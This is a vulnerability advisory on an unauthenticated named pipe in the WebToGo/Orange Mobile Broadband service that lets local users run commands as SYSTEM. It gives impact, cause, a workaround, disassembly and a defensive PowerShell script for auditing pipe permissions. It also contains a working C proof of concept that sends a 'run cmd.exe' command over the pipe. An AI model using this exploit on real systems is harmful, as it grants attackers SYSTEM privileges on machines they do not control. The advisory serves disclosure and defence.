WebToGo 3G Dongle Software - Named Pipe Arbitrary Command Execution

  • Type: WebToGo 3G Dongle Software - Named Pipe Arbitrary Command Execution
  • Severity: High
  • Affected products: WebToGo 3G Dongles
  • Affected Versions: Orange Mobile Broadband Version Build Version: 20100830112700 confirmed to be vulnerable; other previous versions and vendors using WebToGo libraries are expected to be vulnerable.
  • Vendor: WebToGo
  • Vendor Response: A user should receive a prompt to upgrade.
  • Local/Remote: Local (see dependencies)
  • Vulnerability Class: Privilege Escalation
  • Authors: Alex Plaskett
  • Date: 2013-02-25
  • CVE Reference: N/A

Impact

This vulnerability can be used to perform local privilege escalation on devices which have the software installed.

Cause

The vulnerability exists because no authentication or authorisation is performed on connections to the named pipe.

Interim Workaround

As an interim workaround the OrangeMobileBroadband_Service could be stopped whilst not using the 3G connectivity. However, if 3G is required then this service must be running. Therefore full remediation will require a patch by the vendor.

Solution

A software upgrade message will be prompted; however, it does not seem possible to force a manual upgrade. Therefore it may be necessary to apply the interim workaround until a patch update is prompted.

Technical Description

A named pipe is exposed from the OrangeMobileBroadband_Service which does not have any security restrictions applied. The service executes by default under the context of the SYSTEM user. Therefore a low privileged attacker can communicate with the named pipe to invoke the functionality exposed by the service.

The following named pipe is exposed from the OrangeMobileBroadband_Service:

"\\\\.\\pipe\\OrangeMobileBroadband_Service"

The following additional functionality was found to be exposed by the service and could be abused by an attacker:

  • Arbitrary command execution as SYSTEM
  • Arbitrary registry key creation as SYSTEM
  • Arbitrary file delete as SYSTEM
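As an added example that is not part of the advisory or the vendor's software, the following Windows PowerShell 5.1 script audits the DACL of a named pipe on the local host, flagging Allow entries that give broad groups write access (the gap described above), and builds the restrictive PipeSecurity a SYSTEM service should apply instead. The function names and the list of broad SIDs are my own choices; the pipe name is the one from the advisory.

```powershell
# Added example, not part of the original advisory. Assumes Windows PowerShell 5.1
# (.NET Framework System.IO.Pipes, which exposes an instance GetAccessControl()).
Add-Type -AssemblyName System.Core

# Well-known SIDs: Everyone, Authenticated Users, BUILTIN\Users, ANONYMOUS LOGON.
# An Allow entry with WriteData for any of these lets every local user drive a SYSTEM service.
$BroadSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-7')

function Get-PipeAccessReport {
    param([Parameter(Mandatory)][string]$PipeName)
    # Open for READ_CONTROL only (ReadData is required so the .NET client derives a valid
    # PipeDirection); nothing is written, so the service never receives a command.
    $rights = [System.IO.Pipes.PipeAccessRights]'ReadData, ReadPermissions'
    $client = [System.IO.Pipes.NamedPipeClientStream]::new('.', $PipeName, $rights,
        [System.IO.Pipes.PipeOptions]::None,
        [System.Security.Principal.TokenImpersonationLevel]::Anonymous,
        [System.IO.HandleInheritability]::None)
    try {
        $client.Connect(2000)
        $acl = $client.GetAccessControl()
        $write = [int][System.IO.Pipes.PipeAccessRights]::WriteData
        foreach ($rule in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
            $sid = $rule.IdentityReference.Value
            $grantsWrite = (([int]$rule.PipeAccessRights) -band $write) -ne 0
            [pscustomobject]@{
                Pipe   = $PipeName
                Sid    = $sid
                Rights = $rule.PipeAccessRights
                Type   = $rule.AccessControlType
                Weak   = ($rule.AccessControlType -eq 'Allow') -and $grantsWrite -and ($BroadSids -contains $sid)
            }
        }
    } finally { $client.Dispose() }
}

function New-ServicePipeSecurity {
    # DACL a SYSTEM service should pass to CreateNamedPipe / NamedPipeServerStream:
    # full control for SYSTEM and Administrators, no entry for anyone else.
    $ps = [System.IO.Pipes.PipeSecurity]::new()
    foreach ($sid in 'S-1-5-18', 'S-1-5-32-544') {
        $id = [System.Security.Principal.SecurityIdentifier]::new($sid)
        $ps.AddAccessRule([System.IO.Pipes.PipeAccessRule]::new($id,
            [System.IO.Pipes.PipeAccessRights]::FullControl,
            [System.Security.AccessControl.AccessControlType]::Allow))
    }
    return $ps
}

Get-PipeAccessReport -PipeName 'OrangeMobileBroadband_Service' | Format-Table -AutoSize
(New-ServicePipeSecurity).GetSecurityDescriptorSddlForm('Access')
```

Any row with Weak set to True is a pipe a standard user can send commands to; the SDDL printed last is the shape of the DACL that closes that gap.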

The following disassembly demonstrates the service's ability to spawn an arbitrary executable using the ShellExecuteExW function:

.text:004079FE cmp ax, 30h
.text:00407A02 jnz loc_407BF2
.text:00407A08 push offset aParam40RunSpec ; "Param 40 - Run specified
.text:00407A0D call sub_40BB00
.text:00407AB4 lea eax, [esp+8E80h+Dest]
.text:00407ABB mov [esp+8E80h+pExecInfo.lpFile], eax
.text:00407AC2 add esp, 0Ch
.text:00407AC5 mov [esp+8E74h+pExecInfo.cbSize], 3Ch
.text:00407AD0 mov [esp+8E74h+pExecInfo.fMask], 40h
.text:00407ADB mov [esp+8E74h+pExecInfo.hwnd], edi
.text:00407AE2 mov [esp+8E74h+pExecInfo.lpVerb], edi
.text:00407AE9 mov ecx, offset Dependencies
.text:00407AEE lea eax, [esp+8E74h+Data]
.text:00407B76 lea edx, [esp+8E74h+pExecInfo]
.text:00407B7D mov esi, 1
.text:00407B82 push edx ; pExecInfo
.text:00407B83 mov [esp+8E78h+pExecInfo.hInstApp], edi
.text:00407B8A mov [esp+8E78h+pExecInfo.lpDirectory], edi
.text:00407B91 mov [esp+8E78h+pExecInfo.nShow], esi
.text:00407B98 call ds:ShellExecuteExW

Exploitation

The following code can be used to demonstrate a low privileged user spawning a cmd.exe shell with SYSTEM privileges.

#include <windows.h>

int main(void)
{
    /* "40" selects the service's "Run specified" command; the path and arguments follow, pipe-separated */
    wchar_t str[] = L"\x34\x30|C:\\Windows\\System32\\cmd.exe|args|args|args";
    HANDLE hPipe = CreateFileW(L"\\\\.\\pipe\\OrangeMobileBroadband_Service",
                               GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
    if (hPipe == INVALID_HANDLE_VALUE) return 1;
    DWORD dwWritten = 0;
    WriteFile(hPipe, str, sizeof(str), &dwWritten, 0);
    CloseHandle(hPipe);
    return 0;
}

Dependencies

In order to exploit this vulnerability an attacker requires a low privileged account on the system. However, this issue can be exploited remotely through the named pipe if the credentials of a low privileged user account on the system are known.